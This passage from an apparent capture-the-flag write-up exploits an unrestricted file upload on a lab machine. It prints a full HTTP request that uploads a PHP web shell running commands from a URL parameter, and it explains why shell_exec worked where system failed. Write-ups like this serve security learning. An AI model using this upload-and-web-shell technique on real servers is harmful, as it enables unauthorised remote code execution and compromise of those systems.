As Paul, we have access to a file upload service to supposedly upload only zip files.
Of course, from the source code, we can obviously see that there are no upload restrictions at all. (Not even file type or file name)
Moreover, we control the file name to be uploaded in the
task field. Using Burp Suite, we can send a PHP one liner to allow for remote code execution.
POST /portal/includes/fileController.php HTTP/1.1Host: 10.10.10.228Content-Length: 338Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPnOrigin: http://10.10.10.228Referer: http://10.10.10.228/portal/php/files.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCUConnection: close ------WebKitFormBoundaryHBZNum5szzVSddPnContent-Disposition: form-data; name="file"; filename="shell.php"Content-Type: application/x-httpd-php <?php echo shell_exec($_GET['cmd']); ?> ------WebKitFormBoundaryHBZNum5szzVSddPnContent-Disposition: form-data; name="task" nothing.php------WebKitFormBoundaryHBZNum5szzVSddPn--
While I first tried to use the PHP
system command, there seems to be an error when performing the upload. I suspect that
system is not allowed by the PHP configuration.
shell_exec solves the issue.